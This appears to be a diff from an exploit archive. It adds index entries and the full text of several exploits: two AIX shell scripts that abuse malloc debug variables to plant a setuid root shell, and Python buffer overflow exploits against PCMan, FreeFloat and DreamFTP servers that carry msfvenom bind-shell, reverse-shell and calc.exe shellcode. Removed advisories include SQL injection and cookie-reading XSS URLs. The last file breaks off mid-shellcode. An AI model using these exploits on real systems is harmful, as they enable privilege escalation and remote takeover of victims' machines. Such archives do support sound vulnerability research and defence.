40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection (1)",2016-10-06,OoN_Boy,php,webapps,0
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
@ -36711,7 +36707,7 @@ id,file,description,date,author,platform,type,port
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
@ -36797,3 +36793,9 @@ id,file,description,date,author,platform,type,port
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40711,platforms/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0
40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0

Can't render this file because it is too large.

62
platforms/aix/local/40709.sh Executable file
View file

@ -0,0 +1,62 @@
#!/usr/bin/sh
#
# AIX lsmcode local root exploit.
#
# Affected: AIX 6.1/7.1/7.2.0.2
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
if [ ! -x "/usr/sbin/lsmcode" ]; then
echo "[-] lsmcode isn't executable. Exploit failed."
exit 1
fi
echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Exporting variables"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
echo "[*] Setting umask to 000"
umask 000
echo "[*] Executing vulnerable binary [lsmcode]"
/usr/sbin/lsmcode -c >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Preparing escalation"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Cleaning up environment variables"
unset MALLOCBUCKETS MALLOCOPTIONS
echo "[*] Escalating"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"

131
platforms/aix/local/40710.sh Executable file
View file

@ -0,0 +1,131 @@
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
# environment variables, which allows local users to gain privileges by
# leveraging a setuid-root program to create an arbitrary root-owned file
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
# library) in AIX 5.3 and libc.a in AIX 6.1.
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
# File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector.
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
APP=$0
function usage
{
echo "Usage: $APP [1] | [2] | [3]"
echo
echo "1 - MALLOCDEBUG file write -> escalation"
echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
echo "3 - MALLOCBUCKETS file write -> escalation"
echo
echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
exit
}
function CVE20091786
{
echo "[*] Exporting MALLOCDEBUG environment variable"
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/etc/suid_profile
export MALLOCTYPE MALLOCDEBUG
}
function CVE20092669
{
echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=/etc/suid_profile
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
}
function CVE20143074
{
echo "[*] Exporting MALLOCBUCKETS environment variable"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
}
if [ -z "$1" ]; then
usage
exit 1
fi
while [ "$1" != "" ]; do
case $1 in
1 ) CVE20091786;;
2 ) CVE20092669;;
3 ) CVE20143074;;
* ) usage
break;;
esac
shift
done
if [ ! -x "/usr/sbin/lquerylv" ]; then
echo "[-] lquerylv isn't executable. Tough luck."
exit 1
fi
echo "[*] Setting umask to 000"
umask 000
echo "[*] Execute our vulnerable binary"
/usr/sbin/lquerylv >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Adding payload"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Unsetting env"
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
echo "[*] Executing ibstat for fun and profit"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL

9
platforms/php/webapps/24658.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/11337/info
It is reported that CubeCart is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI data prior to including it in an SQL query.
An attacker may exploit this issue to manipulate SQL queries, potentially revealing or corrupting sensitive database data. This issue may also facilitate attacks against the underlying database software.
This vulnerability is reported to exist in version 2.0.1 of CubeCart. Other versions may also be affected.
http://www.example.com/store/index.php?cat_id=1 or 1=1

29
platforms/php/webapps/34056.txt
View file

@ -1,29 +0,0 @@
source: http://www.securityfocus.com/bid/40444/info
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects Joomla! versions prior to 1.5.18.
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

7
platforms/php/webapps/34114.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/40690/info
The JForJoomla JReservation component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>

7
platforms/php/webapps/34137.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/40828/info
The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?r=[XSS]

9
platforms/php/webapps/34144.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/40860/info
The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URI is available:
http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]

58
platforms/windows/remote/40711.py Executable file
View file

@ -0,0 +1,58 @@
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a
import socket
# shellcode with metasploit:
# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
# nc 192.168.1.150 4444
ret = "\x2F\x1D\xF1\x77" # GDI32.dll
shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a"
"\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11"
"\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac"
"\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4"
"\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07"
"\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c"
"\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53"
"\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8"
"\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48"
"\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39"
"\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e"
"\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35"
"\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77"
"\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde"
"\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51"
"\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41"
"\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52"
"\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83"
"\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2"
"\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34"
"\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0"
"\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4"
"\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe")
buffer = '\x90' * 30 + shellcode
buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer))
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('SITE ZONE' + buffer1 + '\r\n')
s.close()

58
platforms/windows/remote/40712.py Executable file
View file

@ -0,0 +1,58 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
#Exploit Title: PCMan FTP Server 2.0 Buffer Overflow NLST command
#Date: 03/11/16
#Exploit Author: Karri93
#Version: 2.0
#Tested on: Windows XP Profesional SP3 Spanish x86
#CVE: N/A
#Shellcode Metasploit:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
#nc -lvp 443
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
"\xce\x7e\xdd\x9a\xef\xaa")
buffer= '\x90'*30 + shellcode
buffer1= '\x41' * 2007 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.43',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS \r\n')
s.recv(1024)
s.send('NLST' + buffer1 + '\r\n')
s.close()

45
platforms/windows/remote/40713.py Executable file
View file

@ -0,0 +1,45 @@
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a
import socket
# shellcode with metasploit:
# msfvenom -p windows/exec CMD=calc.exe -b'\x00\x0A\x0D' -f c
ret = "\xD7\x30\x6B\x7E" #SHELL32.dll
shellcode = ("\xdb\xd6\xbf\x70\x7b\xf3\x98\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x74\x99\x06\x64\x9c\xdf"
"\xe9\x95\x5c\x80\x60\x70\x6d\x80\x17\xf0\xdd\x30\x53\x54\xd1"
"\xbb\x31\x4d\x62\xc9\x9d\x62\xc3\x64\xf8\x4d\xd4\xd5\x38\xcf"
"\x56\x24\x6d\x2f\x67\xe7\x60\x2e\xa0\x1a\x88\x62\x79\x50\x3f"
"\x93\x0e\x2c\xfc\x18\x5c\xa0\x84\xfd\x14\xc3\xa5\x53\x2f\x9a"
"\x65\x55\xfc\x96\x2f\x4d\xe1\x93\xe6\xe6\xd1\x68\xf9\x2e\x28"
"\x90\x56\x0f\x85\x63\xa6\x57\x21\x9c\xdd\xa1\x52\x21\xe6\x75"
"\x29\xfd\x63\x6e\x89\x76\xd3\x4a\x28\x5a\x82\x19\x26\x17\xc0"
"\x46\x2a\xa6\x05\xfd\x56\x23\xa8\xd2\xdf\x77\x8f\xf6\x84\x2c"
"\xae\xaf\x60\x82\xcf\xb0\xcb\x7b\x6a\xba\xe1\x68\x07\xe1\x6f"
"\x6e\x95\x9f\xdd\x70\xa5\x9f\x71\x19\x94\x14\x1e\x5e\x29\xff"
"\x5b\x90\x63\xa2\xcd\x39\x2a\x36\x4c\x24\xcd\xec\x92\x51\x4e"
"\x05\x6a\xa6\x4e\x6c\x6f\xe2\xc8\x9c\x1d\x7b\xbd\xa2\xb2\x7c"
"\x94\xc0\x55\xef\x74\x29\xf0\x97\x1f\x35")
buffer = '\x90'*30 + shellcode
buffer2 = '\x41' * 2001 + ret + buffer + '\x43'*(749-len(buffer))
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('SITE CHMOD' + buffer2 + '\r\n')
s.close()

74
platforms/windows/remote/40714.py Executable file
View file

@ -0,0 +1,74 @@
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
# Author: Pablo González
# Date: 4/11/2016
# Software: PCMan 2.0
# Tested on: Windows XP Profesional SP3 Spanish x86
import socket
print "Creating malicious input!"
junk = '\x41'*2007
ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7
nops = '\x90'*20
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
#put shellcode in variable 'sc'
sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
buffer= junk + ret + nops + sc
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = raw_input('Give me Remote IP Address:')
connect=s.connect((ip,21))
banner = s.recv(1024)
print banner
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS\r\n')
s.recv(1024)
#Sending input PORT command (Exploitation is coming)
s.send('PORT' + buffer + '\r\n')
s.close()
#Metasploit exploit/multi/handler or nc <ip> <port> :D
#
# For exploit/multi/handler
#
# use exploit/multi/handler
# set PAYLOAD windows/shell_bind_tcp
# set RHOST <ip>
# set LPORT 1144
# exploit
# ...
# Got it!
print "Got it? :D"

58
platforms/windows/remote/40715.py Executable file
View file

@ -0,0 +1,58 @@
import socket
import os
import sys
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
# Date: 2016.11.04
# Exploit Author: Greg Priest
# Version: DreamFTPServer1.0.2
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")
port = 21
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
